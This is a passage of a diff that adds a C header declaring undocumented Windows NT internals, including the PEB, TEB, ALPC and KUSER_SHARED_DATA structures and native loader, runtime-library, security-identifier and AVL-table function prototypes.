+ PVOID AppCompatInfo;
+
+ UNICODE_STRING CSDVersion;
+
+ PVOID ActivationContextData;
+ PVOID ProcessAssemblyStorageMap;
+
PVOID SystemDefaultActivationContextData;
+ PVOID SystemAssemblyStorageMap;
+
+ SIZE_T MinimumStackCommit;
+
+ PVOID *FlsCallback;
+ LIST_ENTRY FlsListHead;
+ PVOID FlsBitmap;
+ ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)];
+ ULONG FlsHighIndex;
+
+ PVOID WerRegistrationData;
+ PVOID WerShipAssertPtr;
+ PVOID pContextData;
+ PVOID pImageHeaderHash;
+ union
+ {
+ ULONG TracingFlags;
+ struct
+ {
+ ULONG HeapTracingEnabled : 1;
+ ULONG CritSecTracingEnabled : 1;
+ ULONG SpareTracingBits : 30;
+ };
+ };
+} PEB, *PPEB;
+
+typedef struct _TEB_ACTIVE_FRAME_CONTEXT
+{
+ ULONG Flags;
+ PSTR FrameName;
+} TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
+
+typedef struct _TEB_ACTIVE_FRAME
+{
+ ULONG Flags;
+ struct _TEB_ACTIVE_FRAME *Previous;
+ PTEB_ACTIVE_FRAME_CONTEXT Context;
+} TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
+
+#define GDI_BATCH_BUFFER_SIZE 310
+
+typedef struct _GDI_TEB_BATCH {
+ ULONG Offset;
+ UCHAR Alignment[4];
+ ULONG_PTR HDC;
+ ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
+} GDI_TEB_BATCH, *PGDI_TEB_BATCH;
+
+typedef struct _TEB
+{
+ NT_TIB NtTib;
+
+ PVOID EnvironmentPointer;
+ CLIENT_ID ClientId;
+ PVOID ActiveRpcHandle;
+ PVOID ThreadLocalStoragePointer;
+ PPEB ProcessEnvironmentBlock;
+
+ ULONG LastErrorValue;
+ ULONG CountOfOwnedCriticalSections;
+ PVOID CsrClientThread;
+ PVOID Win32ThreadInfo;
+ ULONG User32Reserved[26];
+ ULONG UserReserved[5];
+ PVOID WOW32Reserved;
+ LCID CurrentLocale;
+ ULONG FpSoftwareStatusRegister;
+ PVOID SystemReserved1[54];
+ NTSTATUS ExceptionCode;
+ PVOID ActivationContextStackPointer;
+#if defined(_M_X64)
+ UCHAR SpareBytes[24];
+#else
+ UCHAR SpareBytes[36];
+#endif
+ ULONG TxFsContext;
+
+ GDI_TEB_BATCH GdiTebBatch;
+ CLIENT_ID RealClientId;
+ HANDLE GdiCachedProcessHandle;
+ ULONG GdiClientPID;
+ ULONG GdiClientTID;
+ PVOID GdiThreadLocalInfo;
+ ULONG_PTR Win32ClientInfo[62];
+ PVOID glDispatchTable[233];
+ ULONG_PTR glReserved1[29];
+ PVOID glReserved2;
+ PVOID glSectionInfo;
+ PVOID glSection;
+
PVOID glTable;
+ PVOID glCurrentRC;
+ PVOID glContext;
+
+ NTSTATUS LastStatusValue;
+ UNICODE_STRING StaticUnicodeString;
+ WCHAR StaticUnicodeBuffer[261];
+
+ PVOID DeallocationStack;
+ PVOID TlsSlots[64];
+ LIST_ENTRY TlsLinks;
+
+ PVOID Vdm;
+ PVOID ReservedForNtRpc;
+ PVOID DbgSsReserved[2];
+
+ ULONG HardErrorMode;
+#if defined(_M_X64)
+ PVOID Instrumentation[11];
+#else
+ PVOID Instrumentation[9];
+#endif
+ GUID ActivityId;
+
+ PVOID SubProcessTag;
+ PVOID EtwLocalData;
+ PVOID EtwTraceData;
+ PVOID WinSockData;
+ ULONG GdiBatchCount;
+
+ union
+ {
+ PROCESSOR_NUMBER CurrentIdealProcessor;
+ ULONG IdealProcessorValue;
+ struct
+ {
+ UCHAR ReservedPad0;
+ UCHAR ReservedPad1;
+ UCHAR ReservedPad2;
+ UCHAR IdealProcessor;
+ };
+ };
+
+ ULONG GuaranteedStackBytes;
+ PVOID ReservedForPerf;
+ PVOID ReservedForOle;
+ ULONG WaitingOnLoaderLock;
+ PVOID SavedPriorityState;
+ ULONG_PTR SoftPatchPtr1;
+ PVOID ThreadPoolData;
+ PVOID *TlsExpansionSlots;
+#if defined(_M_X64)
+ PVOID DeallocationBStore;
+ PVOID BStoreLimit;
+#endif
+ ULONG MuiGeneration;
+ ULONG IsImpersonating;
+ PVOID NlsCache;
+ PVOID pShimData;
+ ULONG HeapVirtualAffinity;
+ HANDLE CurrentTransactionHandle;
+ PTEB_ACTIVE_FRAME ActiveFrame;
+ PVOID FlsData;
+
+ PVOID PreferredLanguages;
+ PVOID UserPrefLanguages;
+ PVOID MergedPrefLanguages;
+ ULONG MuiImpersonation;
+
+ union
+ {
+ USHORT CrossTebFlags;
+ USHORT SpareCrossTebBits : 16;
+ };
+ union
+ {
+ USHORT SameTebFlags;
+ struct
+ {
+ USHORT SafeThunkCall : 1;
+ USHORT InDebugPrint : 1;
+ USHORT HasFiberData : 1;
+ USHORT SkipThreadAttach : 1;
+ USHORT WerInShipAssertCode : 1;
+ USHORT RanProcessInit : 1;
+ USHORT ClonedThread : 1;
+ USHORT SuppressDebugMsg : 1;
+ USHORT DisableUserStackWalk : 1;
+ USHORT RtlExceptionAttached : 1;
+ USHORT InitialThread : 1;
+ USHORT SpareSameTebBits : 1;
+ };
+ };
+
+ PVOID TxnScopeEnterCallback;
+ PVOID TxnScopeExitCallback;
+ PVOID TxnScopeContext;
+ ULONG LockCount;
+ ULONG SpareUlong0;
+ PVOID
ResourceRetValue;
+} TEB, *PTEB;
+
+__inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; }
+
+/*
+** PEB/TEB END
+*/
+
+/*
+** ALPC START
+*/
+
+typedef struct _PORT_MESSAGE {
+ union {
+ struct {
+ CSHORT DataLength;
+ CSHORT TotalLength;
+ } s1;
+ ULONG Length;
+ } u1;
+ union {
+ struct {
+ CSHORT Type;
+ CSHORT DataInfoOffset;
+ } s2;
+ ULONG ZeroInit;
+ } u2;
+ union {
+ CLIENT_ID ClientId;
+ double DoNotUseThisField; // Force quadword alignment
+ } u3;
+ ULONG MessageId;
+ union {
+ ULONG ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message
+ ULONG CallbackId; // Only valid on LPC_REQUEST message
+ } u4;
+ UCHAR Reserved[8];
+} PORT_MESSAGE, *PPORT_MESSAGE;
+
+// end_ntsrv
+
+typedef struct _PORT_DATA_ENTRY {
+ PVOID Base;
+ ULONG Size;
+} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY;
+
+typedef struct _PORT_DATA_INFORMATION {
+ ULONG CountDataEntries;
+ PORT_DATA_ENTRY DataEntries[1];
+} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION;
+
+#define LPC_REQUEST 1
+#define LPC_REPLY 2
+#define LPC_DATAGRAM 3
+#define LPC_LOST_REPLY 4
+#define LPC_PORT_CLOSED 5
+#define LPC_CLIENT_DIED 6
+#define LPC_EXCEPTION 7
+#define LPC_DEBUG_EVENT 8
+#define LPC_ERROR_EVENT 9
+#define LPC_CONNECTION_REQUEST 10
+
+#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE)
+#define PORT_MAXIMUM_MESSAGE_LENGTH 256
+
+typedef struct _LPC_CLIENT_DIED_MSG {
+ PORT_MESSAGE PortMsg;
+ LARGE_INTEGER CreateTime;
+} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG;
+
+typedef struct _PORT_VIEW {
+ ULONG Length;
+ HANDLE SectionHandle;
+ ULONG SectionOffset;
+ ULONG ViewSize;
+ PVOID ViewBase;
+ PVOID ViewRemoteBase;
+} PORT_VIEW, *PPORT_VIEW;
+
+typedef struct _REMOTE_PORT_VIEW {
+ ULONG Length;
+ ULONG ViewSize;
+ PVOID ViewBase;
+} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW;
+
+/*
+** ALPC END
+*/
+
+/*
+** KUSER_SHARED_DATA START
+*/
+
+typedef struct _KSYSTEM_TIME {
+ ULONG LowPart;
+ LONG High1Time;
+ LONG High2Time;
+} KSYSTEM_TIME, *PKSYSTEM_TIME;
+
+typedef enum _NT_PRODUCT_TYPE {
+ NtProductWinNt = 1,
+ NtProductLanManNt,
+ NtProductServer
+} NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE;
+
+#define PROCESSOR_FEATURE_MAX 64
+
+typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE {
+ StandardDesign, // None == 0 == standard design
+ NEC98x86, // NEC PC98xx series on X86
+ EndAlternatives // past end of known alternatives
+} ALTERNATIVE_ARCHITECTURE_TYPE;
+
+//
+// Define Address of User Shared Data
+//
+#define MM_SHARED_USER_DATA_VA 0x000000007FFE0000
+
+//
+// WARNING: this definition is compatibility only.
+// Structure is incomplete. Only important fields.
+//
+typedef struct _KUSER_SHARED_DATA_COMPAT {
+ ULONG TickCountLowDeprecated;
+ ULONG TickCountMultiplier;
+ volatile KSYSTEM_TIME InterruptTime;
+ volatile KSYSTEM_TIME SystemTime;
+ volatile KSYSTEM_TIME TimeZoneBias;
+ USHORT ImageNumberLow;
+ USHORT ImageNumberHigh;
+ WCHAR NtSystemRoot[260];
+ ULONG MaxStackTraceDepth;
+ ULONG CryptoExponent;
+ ULONG TimeZoneId;
+ ULONG LargePageMinimum;
+
+ union {
+ ULONG Reserved2[7];
+ struct {
+ ULONG AitSamplingValue;
+ ULONG AppCompatFlag;
+ struct {
+ ULONG LowPart;
+ ULONG HighPart;
+ } RNGSeedVersion;
+ ULONG GlobalValidationRunlevel;
+ ULONG TimeZoneBiasStamp;
+ ULONG ReservedField;
+ };
+ };
+
+ NT_PRODUCT_TYPE NtProductType;
+ BOOLEAN ProductTypeIsValid;
+ ULONG NtMajorVersion;
+ ULONG NtMinorVersion;
+ BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX];
+ ULONG Reserved1;
+ ULONG Reserved3;
+ volatile ULONG TimeSlip;
+ ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;
+ ULONG AltArchitecturePad;
+ LARGE_INTEGER SystemExpirationDate;
+ ULONG SuiteMask;
+ BOOLEAN KdDebuggerEnabled;
+
+ union {
+ UCHAR MitigationPolicies;
+ struct {
+ UCHAR NXSupportPolicy : 2;
+ UCHAR SEHValidationPolicy : 2;
+ UCHAR CurDirDevicesSkippedForDlls : 2;
+ UCHAR Reserved : 2;
+ UCHAR Reserved6[2];
+ };
+ };
+
+ volatile ULONG ActiveConsoleId;
+ volatile ULONG DismountCount;
+ ULONG ComPlusPackage;
+ ULONG LastSystemRITEventTickCount;
+
ULONG NumberOfPhysicalPages;
+ BOOLEAN SafeBootMode;
+ UCHAR Reserved12[3];
+
+ union {
+ ULONG SharedDataFlags;
+ struct {
+ ULONG DbgErrorPortPresent : 1;
+ ULONG DbgElevationEnabled : 1;
+ ULONG DbgVirtEnabled : 1;
+ ULONG DbgInstallerDetectEnabled: 1;
+ ULONG DbgLkgEnabled : 1;
+ ULONG DbgDynProcessorEnabled : 1;
+ ULONG DbgConsoleBrokerEnabled : 1;
+ ULONG DbgSecureBootEnabled : 1;
+ ULONG DbgMultiSessionSku : 1;
+ ULONG SpareBits : 23;
+ };
+ };
+
+ //incomplete
+
+} KUSER_SHARED_DATA, *PKUSER_SHARED_DATA;
+
+#define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)MM_SHARED_USER_DATA_VA)
+
+/*
+** KUSER_SHARED_DATA END
+*/
+
+/*
+** LDR START
+*/
+
+typedef
+VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)(
+ _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,
+ _In_ PVOID Context,
+ _In_ OUT BOOLEAN *StopEnumeration
+ );
+
+NTSTATUS NTAPI LdrEnumerateLoadedModules(
+ _In_opt_ ULONG Flags,
+ _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction,
+ _In_opt_ PVOID Context
+ );
+
+NTSTATUS NTAPI LdrGetProcedureAddress(
+ _In_ PVOID DllHandle,
+ _In_opt_ CONST ANSI_STRING* ProcedureName,
+ _In_opt_ ULONG ProcedureNumber,
+ _Out_ PVOID *ProcedureAddress
+ );
+
+NTSTATUS NTAPI LdrLoadDll(
+ _In_opt_ PCWSTR DllPath,
+ _In_opt_ PULONG DllCharacteristics,
+ _In_ PCUNICODE_STRING DllName,
+ _Out_ PVOID *DllHandle
+ );
+
+NTSTATUS NTAPI LdrUnloadDll(
+ _In_ PVOID DllHandle
+ );
+
+NTSTATUS NTAPI LdrGetDllHandle(
+ _In_opt_ PCWSTR DllPath OPTIONAL,
+ _In_opt_ PULONG DllCharacteristics OPTIONAL,
+ _In_ PCUNICODE_STRING DllName,
+ _Out_ PVOID *DllHandle
+ );
+
+NTSTATUS NTAPI LdrFindResource_U(
+ _In_ PVOID DllHandle,
+ _In_ CONST ULONG_PTR* ResourceIdPath,
+ _In_ ULONG ResourceIdPathLength,
+ _Out_ PIMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry
+ );
+
+NTSTATUS NTAPI LdrAccessResource(
+ _In_ PVOID DllHandle,
+ _In_ CONST IMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry,
+ _Out_opt_ PVOID *Address,
+ _Out_opt_ PULONG Size
+ );
+
+NTSTATUS NTAPI
LdrFindEntryForAddress(
+ _In_ PVOID Address,
+ _Out_ PLDR_DATA_TABLE_ENTRY *TableEntry
+ );
+
+/*
+** LDR END
+*/
+
+/*
+** Csr Runtime START
+*/
+
+ULONG NTAPI CsrGetProcessId(
+ );
+
+/*
+** Csr Runtime END
+*/
+
+/*
+** Runtime Library API START
+*/
+
+ULONG NTAPI RtlRandomEx(
+ _Inout_ PULONG Seed
+ );
+
+PVOID NTAPI RtlAddVectoredExceptionHandler(
+ _In_ ULONG First,
+ _In_ PVECTORED_EXCEPTION_HANDLER Handler
+ );
+
+ULONG NTAPI RtlRemoveVectoredExceptionHandler(
+ _In_ PVOID Handle
+ );
+
+VOID NTAPI RtlPushFrame(
+ _In_ PTEB_ACTIVE_FRAME Frame
+ );
+
+VOID NTAPI RtlPopFrame(
+ _In_ PTEB_ACTIVE_FRAME Frame
+ );
+
+PTEB_ACTIVE_FRAME NTAPI RtlGetFrame(
+ VOID
+ );
+
+VOID NTAPI RtlInitUnicodeString(
+ _Inout_ PUNICODE_STRING DestinationString,
+ _In_ PCWSTR SourceString
+ );
+
+BOOLEAN NTAPI RtlEqualUnicodeString(
+ _In_ PCUNICODE_STRING String1,
+ _In_ PCUNICODE_STRING String2,
+ _In_ BOOLEAN CaseInSensitive
+ );
+
+BOOLEAN NTAPI RtlPrefixUnicodeString(
+ _In_ PCUNICODE_STRING String1,
+ _In_ PCUNICODE_STRING String2,
+ _In_ BOOLEAN CaseInSensitive
+ );
+
+NTSTATUS NTAPI RtlGetVersion(
+ _Inout_ PRTL_OSVERSIONINFOW lpVersionInformation
+ );
+
+ULONG NTAPI RtlNtStatusToDosError(
+ _In_ NTSTATUS Status
+ );
+
+NTSTATUS NTAPI RtlGetOwnerSecurityDescriptor(
+ _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
+ _Out_ PSID *Owner,
+ _Out_ PBOOLEAN OwnerDefaulted
+ );
+
+NTSTATUS NTAPI RtlGetGroupSecurityDescriptor(
+ _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
+ _Out_ PSID *Group,
+ _Out_ PBOOLEAN GroupDefaulted
+ );
+
+NTSTATUS NTAPI RtlGetDaclSecurityDescriptor(
+ _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
+ _Out_ PBOOLEAN DaclPresent,
+ _Out_ PACL *Dacl,
+ _Out_ PBOOLEAN DaclDefaulted
+ );
+
+NTSTATUS NTAPI RtlGetSaclSecurityDescriptor(
+ _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
+ _Out_ PBOOLEAN SaclPresent,
+ _Out_ PACL *Sacl,
+ _Out_ PBOOLEAN SaclDefaulted
+ );
+
+ULONG NTAPI RtlLengthSecurityDescriptor(
+ _In_ PSECURITY_DESCRIPTOR SecurityDescriptor
+
);
+
+VOID NTAPI RtlMapGenericMask(
+ _In_ PACCESS_MASK AccessMask,
+ _In_ PGENERIC_MAPPING GenericMapping
+ );
+
+VOID NTAPI RtlInitString(
+ PSTRING DestinationString,
+ PCSZ SourceString
+ );
+
+NTSTATUS NTAPI RtlExpandEnvironmentStrings_U(
+ _In_opt_ PVOID Environment,
+ _In_ PCUNICODE_STRING Source,
+ _Out_ PUNICODE_STRING Destination,
+ _Out_opt_ PULONG ReturnedLength
+ );
+
+VOID NTAPI RtlSetLastWin32Error(
+ LONG Win32Error
+ );
+
+PVOID NTAPI RtlAllocateHeap(
+ _In_ PVOID HeapHandle,
+ _In_ ULONG Flags,
+ _In_ SIZE_T Size
+ );
+
+BOOLEAN NTAPI RtlFreeHeap(
+ _In_ PVOID HeapHandle,
+ _In_ ULONG Flags,
+ _In_ PVOID BaseAddress
+ );
+
+BOOLEAN NTAPI RtlValidSid(
+ PSID Sid
+ );
+
+BOOLEAN NTAPI RtlEqualSid(
+ PSID Sid1,
+ PSID Sid2
+ );
+
+BOOLEAN NTAPI RtlEqualPrefixSid(
+ PSID Sid1,
+ PSID Sid2
+ );
+
+ULONG NTAPI RtlLengthRequiredSid(
+ ULONG SubAuthorityCount
+ );
+
+PVOID NTAPI RtlFreeSid(
+ IN PSID Sid
+ );
+
+NTSTATUS NTAPI RtlAllocateAndInitializeSid(
+ IN PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,
+ IN UCHAR SubAuthorityCount,
+ IN ULONG SubAuthority0,
+ IN ULONG SubAuthority1,
+ IN ULONG SubAuthority2,
+ IN ULONG SubAuthority3,
+ IN ULONG SubAuthority4,
+ IN ULONG SubAuthority5,
+ IN ULONG SubAuthority6,
+ IN ULONG SubAuthority7,
+ OUT PSID *Sid
+ );
+
+NTSTATUS NTAPI RtlInitializeSid(
+ PSID Sid,
+ PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,
+ UCHAR SubAuthorityCount
+ );
+
+PSID_IDENTIFIER_AUTHORITY NTAPI RtlIdentifierAuthoritySid(
+ PSID Sid
+ );
+
+PULONG NTAPI RtlSubAuthoritySid(
+ PSID Sid,
+ ULONG SubAuthority
+ );
+
+PUCHAR NTAPI RtlSubAuthorityCountSid(
+ PSID Sid
+ );
+
+ULONG NTAPI RtlLengthSid(
+ PSID Sid
+ );
+
+NTSTATUS NTAPI RtlCopySid(
+ ULONG DestinationSidLength,
+ PSID DestinationSid,
+ PSID SourceSid
+ );
+
+NTSTATUS NTAPI RtlCopySidAndAttributesArray(
+ ULONG ArrayLength,
+ PSID_AND_ATTRIBUTES Source,
+ ULONG TargetSidBufferSize,
+ PSID_AND_ATTRIBUTES TargetArrayElement,
+ PSID TargetSid,
+ PSID *NextTargetSid,
+ PULONG
RemainingTargetSidSize
+ );
+
+NTSTATUS NTAPI RtlLengthSidAsUnicodeString(
+ PSID Sid,
+ PULONG StringLength
+ );
+
+NTSTATUS NTAPI RtlConvertSidToUnicodeString(
+ PUNICODE_STRING UnicodeString,
+ PSID Sid,
+ BOOLEAN AllocateDestinationString
+ );
+
+NTSTATUS NTAPI RtlCreateSecurityDescriptor(
+ PSECURITY_DESCRIPTOR SecurityDescriptor,
+ ULONG Revision
+ );
+
+NTSTATUS NTAPI RtlSetOwnerSecurityDescriptor(
+ PSECURITY_DESCRIPTOR SecurityDescriptor,
+ PSID Owner,
+ BOOLEAN OwnerDefaulted
+ );
+
+FORCEINLINE LUID
+NTAPI
+RtlConvertLongToLuid(
+ LONG Long
+ )
+{
+ LUID TempLuid;
+ LARGE_INTEGER TempLi;
+
+ TempLi.QuadPart = Long;
+ TempLuid.LowPart = TempLi.LowPart;
+ TempLuid.HighPart = TempLi.HighPart;
+ return(TempLuid);
+}
+
+NTSTATUS NTAPI RtlFormatCurrentUserKeyPath(
+ _Out_ PUNICODE_STRING CurrentUserKeyPath
+ );
+
+VOID NTAPI RtlFreeUnicodeString(
+ PUNICODE_STRING UnicodeString
+ );
+
+VOID NTAPI RtlFreeAnsiString(
+ PANSI_STRING AnsiString
+ );
+
+NTSTATUS NTAPI RtlAnsiStringToUnicodeString(
+ PUNICODE_STRING DestinationString,
+ PCANSI_STRING SourceString,
+ BOOLEAN AllocateDestinationString
+ );
+
+BOOLEAN NTAPI RtlDosPathNameToNtPathName_U(
+ _In_ PCWSTR DosFileName,
+ _Out_ PUNICODE_STRING NtFileName,
+ _Out_opt_ PWSTR *FilePart,
+ PVOID Reserved
+ );
+
+NTSTATUS NTAPI RtlGetCompressionWorkSpaceSize(
+ _In_ USHORT CompressionFormatAndEngine,
+ _Out_ PULONG CompressBufferWorkSpaceSize,
+ _Out_ PULONG CompressFragmentWorkSpaceSize
+ );
+
+NTSTATUS NTAPI RtlCompressBuffer(
+ _In_ USHORT CompressionFormatAndEngine,
+ _In_ PUCHAR UncompressedBuffer,
+ _In_ ULONG UncompressedBufferSize,
+ _Out_ PUCHAR CompressedBuffer,
+ _In_ ULONG CompressedBufferSize,
+ _In_ ULONG UncompressedChunkSize,
+ _Out_ PULONG FinalCompressedSize,
+ _In_ PVOID WorkSpace
+ );
+
+NTSTATUS NTAPI RtlDecompressBuffer(
+ _In_ USHORT CompressionFormat,
+ _Out_ PUCHAR UncompressedBuffer,
+ _In_ ULONG UncompressedBufferSize,
+ _In_ PUCHAR CompressedBuffer,
+ _In_ ULONG CompressedBufferSize,
+
_Out_ PULONG FinalUncompressedSize
+ );
+
+PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(
+ _In_ PVOID Base
+ );
+
+NTSYSAPI PVOID NTAPI RtlAddressInSectionTable(
+ _In_ PIMAGE_NT_HEADERS NtHeaders,
+ _In_ PVOID BaseOfImage,
+ _In_ ULONG VirtualAddress
+ );
+
+PVOID NTAPI RtlImageDirectoryEntryToData(
+ PVOID BaseOfImage,
+ BOOLEAN MappedAsImage,
+ USHORT DirectoryEntry,
+ PULONG Size
+ );
+
+VOID NTAPI RtlSecondsSince1970ToTime(
+ ULONG ElapsedSeconds,
+ PLARGE_INTEGER Time
+ );
+
+VOID NTAPI RtlSecondsSince1980ToTime(
+ ULONG ElapsedSeconds,
+ PLARGE_INTEGER Time
+ );
+
+BOOLEAN NTAPI RtlTimeToSecondsSince1980(
+ PLARGE_INTEGER Time,
+ PULONG ElapsedSeconds
+ );
+
+VOID NTAPI RtlTimeToTimeFields(
+ _Inout_ PLARGE_INTEGER Time,
+ _Inout_ PTIME_FIELDS TimeFields
+ );
+
+BOOLEAN NTAPI RtlTimeFieldsToTime(
+ PTIME_FIELDS TimeFields,
+ PLARGE_INTEGER Time
+ );
+
+ULONG32 NTAPI RtlComputeCrc32(
+ _In_ ULONG32 PartialCrc,
+ _In_ PVOID Buffer,
+ _In_ ULONG Length
+ );
+
+VOID NTAPI RtlGetNtVersionNumbers(
+ _Out_opt_ PULONG MajorVersion,
+ _Out_opt_ PULONG MinorVersion,
+ _Out_opt_ PULONG BuildNumber
+ );
+
+PPEB NTAPI RtlGetCurrentPeb(
+ VOID
+ );
+
+PWSTR NTAPI RtlIpv4AddressToStringW(
+ __in const struct in_addr *Addr,
+ __out_ecount(16) PWSTR S
+ );
+
+NTSTATUS NTAPI RtlAdjustPrivilege(
+ ULONG Privilege,
+ BOOLEAN Enable,
+ BOOLEAN Client,
+ PBOOLEAN WasEnabled
+ );
+
+ULONG DbgPrint(
+ _In_ PCH Format,
+ ...
+ );
+
+/*
+** Runtime Library API END
+*/
+
+/*
+** Generic AVL API START
+*/
+typedef ULONG CLONG;
+
+typedef enum _TABLE_SEARCH_RESULT {
+ TableEmptyTree,
+ TableFoundNode,
+ TableInsertAsLeft,
+ TableInsertAsRight
+} TABLE_SEARCH_RESULT;
+
+typedef enum _RTL_GENERIC_COMPARE_RESULTS {
+ GenericLessThan,
+ GenericGreaterThan,
+ GenericEqual
+} RTL_GENERIC_COMPARE_RESULTS;
+
+typedef struct _RTL_AVL_TABLE RTL_AVL_TABLE;
+typedef struct PRTL_AVL_TABLE *_RTL_AVL_TABLE;
+
+typedef RTL_GENERIC_COMPARE_RESULTS(NTAPI *PRTL_AVL_COMPARE_ROUTINE)(
+ _In_ _RTL_AVL_TABLE *Table,
+ _In_ PVOID FirstStruct,
+ _In_ PVOID SecondStruct
+ );
+
+typedef PVOID(NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)(
+ _In_ _RTL_AVL_TABLE *Table,
+ _In_ ULONG ByteSize
+ );
+
+typedef VOID(NTAPI *PRTL_AVL_FREE_ROUTINE)(
+ _In_ _RTL_AVL_TABLE *Table,
+ _In_ _Post_invalid_ PVOID Buffer
+ );
+
+typedef NTSTATUS(NTAPI *PRTL_AVL_MATCH_FUNCTION)(
+ _In_ _RTL_AVL_TABLE *Table,
+ _In_ PVOID UserData,
+ _In_ PVOID MatchData
+ );
+
+typedef struct _RTL_BALANCED_LINKS {
+ struct _RTL_BALANCED_LINKS *Parent;
+ struct _RTL_BALANCED_LINKS *LeftChild;
+ struct _RTL_BALANCED_LINKS *RightChild;
+ CHAR Balance;
+ UCHAR Reserved[3];
+} RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS;
+
+typedef struct _RTL_AVL_TABLE {
+ RTL_BALANCED_LINKS BalancedRoot;
+ PVOID OrderedPointer;
+ ULONG WhichOrderedElement;
+ ULONG NumberGenericTableElements;
+ ULONG DepthOfTree;
+ PRTL_BALANCED_LINKS RestartKey;
+ ULONG DeleteCount;
+ PRTL_AVL_COMPARE_ROUTINE CompareRoutine;
+ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;
+ PRTL_AVL_FREE_ROUTINE FreeRoutine;
+ PVOID TableContext;
+} RTL_AVL_TABLE, *PRTL_AVL_TABLE;
+
+VOID NTAPI RtlInitializeGenericTableAvl(
+ _Out_ PRTL_AVL_TABLE Table,
+ _In_ PRTL_AVL_COMPARE_ROUTINE CompareRoutine,
+ _In_ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine,
+ _In_ PRTL_AVL_FREE_ROUTINE FreeRoutine,
+ _In_opt_ PVOID TableContext
+ );
+
+PVOID NTAPI RtlInsertElementGenericTableAvl(
+ _In_ PRTL_AVL_TABLE Table,
+
_In_reads_bytes_(BufferSize) PVOID Buffer,
+ _In_ CLONG BufferSize,
+ _Out_opt_ PBOOLEAN NewElement
+ );
+
+PVOID NTAPI RtlInsertElementGenericTableFullAvl(
+ _In_ PRTL_AVL_TABLE Table,
+ _In_reads_bytes_(BufferSize) PVOID Buffer,
+ _In_ CLONG BufferSize,
+ _Out_opt_ PBOOLEAN NewElement,
+ _In_ PVOID NodeOrParent,
+ _In_ TABLE_SEARCH_RESULT SearchResult
+ );
+
+BOOLEAN NTAPI RtlDeleteElementGenericTableAvl(
+ _In_ PRTL_AVL_TABLE Table,
+ _In_ PVOID Buffer
+ );
+
+PVOID NTAPI RtlLookupElementGenericTableAvl(
+ _In_ PRTL_AVL_TABLE Table,
+ _In_ PVOID Buffer
+ );
+
+PVOID NTAPI RtlLookupElementGenericTableFullAvl(
+ _In_ PRTL_AVL_TABLE Table,
+ _In_ PVOID Buffer,
+ _Out_ PVOID *NodeOrParent,
+ _Out_ TABLE_SEARCH_RESULT *SearchResult
+ );
+
+PVOID NTAPI RtlEnumerateGenericTableAvl(
+ _In_ PRTL_AVL_TABLE Table,
+ _In_ BOOLEAN Restart
+ );
+
+PVOID NTAPI RtlEnumerateGenericTableWithoutSplayingAvl(
+ _In_ PRTL_AVL_TABLE Table,
+ _Inout_ PVOID *RestartKey
+ );
+
+PVOID NTAPI RtlLookupFirstMatchingElementGenericTableAvl(
+ _In_ PRTL_AVL_TABLE Table,
+ _In_ PVOID Buffer,
+ _Out_ PVOID *RestartKey
+ );
+
+PVOID NTAPI RtlEnumerateGenericTableLikeADirectory(
+ _In_ PRTL_AVL_TABLE Table,
+ _In_opt_ PRTL_AVL_MATCH_FUNCTION MatchFunction,
+ _In_opt_ PVOID MatchData,
+ _In_ ULONG NextFlag,
+ _Inout_ PVOID *RestartKey,
+ _Inout_ PULONG DeleteCount,
+ _In_ PVOID Buffer
+ );
+
+PVOID NTAPI RtlGetElementGenericTableAvl(
+ _In_ PRTL_AVL_TABLE Table,
+ _In_ ULONG I
+ );
+
+ULONG NTAPI RtlNumberGenericTableElementsAvl(
+ _In_ PRTL_AVL_TABLE Table
+ );
+
+BOOLEAN NTAPI RtlIsGenericTableEmptyAvl(
+ _In_ PRTL_AVL_TABLE Table
+ );
+
+/*
+** Generic Avl END
+*/
+
+/*
+** Critical Section START
+*/
+#define LOGICAL ULONG
+
+NTSTATUS NTAPI RtlEnterCriticalSection(
+ PRTL_CRITICAL_SECTION CriticalSection
+ );
+
+NTSTATUS NTAPI RtlLeaveCriticalSection(
+ PRTL_CRITICAL_SECTION CriticalSection
+ );
+
+LOGICAL NTAPI RtlIsCriticalSectionLocked(
+ IN PRTL_CRITICAL_SECTION CriticalSection
+ );
+
+LOGICAL NTAPI RtlIsCriticalSectionLockedByThread(
+ IN PRTL_CRITICAL_SECTION CriticalSection
+ );
+
+ULONG NTAPI RtlGetCriticalSectionRecursionCount(
+ IN PRTL_CRITICAL_SECTION CriticalSection
+ );
+
+LOGICAL NTAPI RtlTryEnterCriticalSection(
+ PRTL_CRITICAL_SECTION CriticalSection
+ );
+
+NTSTATUS NTAPI RtlInitializeCriticalSection(
+ PRTL_CRITICAL_SECTION CriticalSection
+ );
+
+VOID NTAPI RtlEnableEarlyCriticalSectionEventCreation(
+ VOID
+ );
+
